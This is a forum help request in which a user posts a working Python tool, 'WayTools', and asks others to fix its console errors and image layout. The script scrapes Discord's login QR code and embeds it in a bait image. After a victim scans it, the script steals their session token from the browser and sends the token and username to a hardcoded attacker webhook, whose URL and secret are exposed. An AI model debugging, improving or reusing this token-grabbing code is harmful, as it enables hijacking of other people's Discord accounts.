"%c[LoginQRSocket] font-weight: bold; color: purple; [40919ms] remote auth handshake started, awaiting ticket/cancel.", source: https://discord.co
Hello i have some problems maybe someone can help me it will be very cool:
from PIL import Image
from bs4 import BeautifulSoup
from selenium import webdriver
import base64
import pyfiglet
import time
import os
from discord import Webhook
from urllib.request import Request, urlopen
from json import loads
import re
import cairosvg

web_hook_url = r"https://discord.com/api/webhooks/1227118166627450880/KJLY7IRklmw65IwvwlFhX9kd6LiXbV8DmSyVueTBIIASwbuQNnFcba45qHDwoxDw_QbA"
print(pyfiglet.figlet_format("WayTools"))
token = ""
WINDOW_SIZE = "0,0"
options = webdriver.ChromeOptions()
options.add_argument("--headless")
options.add_argument("--window-size=%s" % WINDOW_SIZE)
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_experimental_option('detach', True)
driver = webdriver.Chrome(options=options)

driver.get('https://discord.com/login')
print("Setting up the QR code")
time.sleep(2)
page_source = driver.page_source
soup = BeautifulSoup(page_source, features='lxml')

# Recherchez l'élément div contenant l'image QR code
classe = soup.find('div', {'class': 'qrCode_bef5bf'})

# Vérifiez si l'élément div a été trouvé
if classe:
    # Obtenez le contenu SVG de l'élément div
    svg_content = classe.find('svg').prettify()

    # Convertissez le contenu SVG en image et enregistrez-la
    with open('temp_qr_code.png', 'wb') as f:
        cairosvg.svg2png(bytestring=svg_content, write_to=f)

    # Continuez le traitement de l'image QR code comme précédemment
    qrcode_image_path = 'temp_qr_code.png'
    img_qr_big = Image.open(qrcode_image_path).convert('RGB')

    # Supprimer l'image temporaire du QR code
    os.remove(qrcode_image_path)

    face = Image.open(r'temp\overlay.png')
    pos = ((img_qr_big.size[0] - face.size[0]) // 2, (img_qr_big.size[1] - face.size[1]) // 2)
    img_qr_big.paste(face, pos)
    im1 = Image.open('temp/template.png', 'r')
    im1.paste(img_qr_big, (120, 409))
    print("Complete...")
    print("Saving...")
    filename = input("What would you like to name your picture? (Do not add extension): ")
    time.sleep(1)
    im1.save(filename + ".png")
    cururl = driver.current_url
    print("Waiting for user to scan...")
    while True:
        if driver.current_url != cururl:
            token = driver.execute_script('''
            var req = webpackJsonp.push([
                [], {
                    extra_id: (e, t, r) => e.exports = r
                },
                [
                    ["extra_id"]
                ]
            ]);
            for (let e in req.c)
                if (req.c.hasOwnProperty(e)) {
                    let t = req.c[e].exports;
                    if (t && t.__esModule && t.default)
                        for (let e in t.default) "getToken" === e && (gotem = t.default.getToken())
                }
            return gotem;''')
            driver.close()
            break
    print("The user has scanned it...")
    print("Info received...")
    print("Sending to Webhook...")
    content_type = "application/json"
    headers = {
        "Content-Type": content_type,
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
    }
    if token:
        headers.update({"Authorization": token})
    j = loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=headers)).read().decode())
    a = j['username'] + "#" + j['discriminator']
    webhook = Webhook.from_url(web_hook_url)
    ok = "Token: \n" + token + "\n\nUsername: \n" + a
    webhook.send(ok)
    print("Thank you for using")
else:
    print("Impossible de trouver l'élément div avec la classe qrCodeOverlay_ae8574.")


Yo everyone hope you can help me i have 2 problems it works but when I login with the qr i have this error: [0416/065406.264:INFO:CONSOLE(23)] "%c[LoginQRSocket]
font-weight: bold;
color: purple;
[40919ms] remote auth handshake started, awaiting ticket/cancel.", source: https://discord.com/assets/43455.8c79ce3e1753b38de4a4.js (23)
[0416/065406.466:INFO:CONSOLE(0)] "Third-party cookie will be blocked. Learn more in the Issues tab.", source: https://discord.com/login (0)
[0416/065406.466:INFO:CONSOLE(0)] "Third-party cookie will be blocked. Learn more in the Issues       tab.", source: https://discord.com/login (0)`
And also it is showing up on the wrong way it don't take alle the space yo ucan see on this photo 
Thanks for the help ! <3
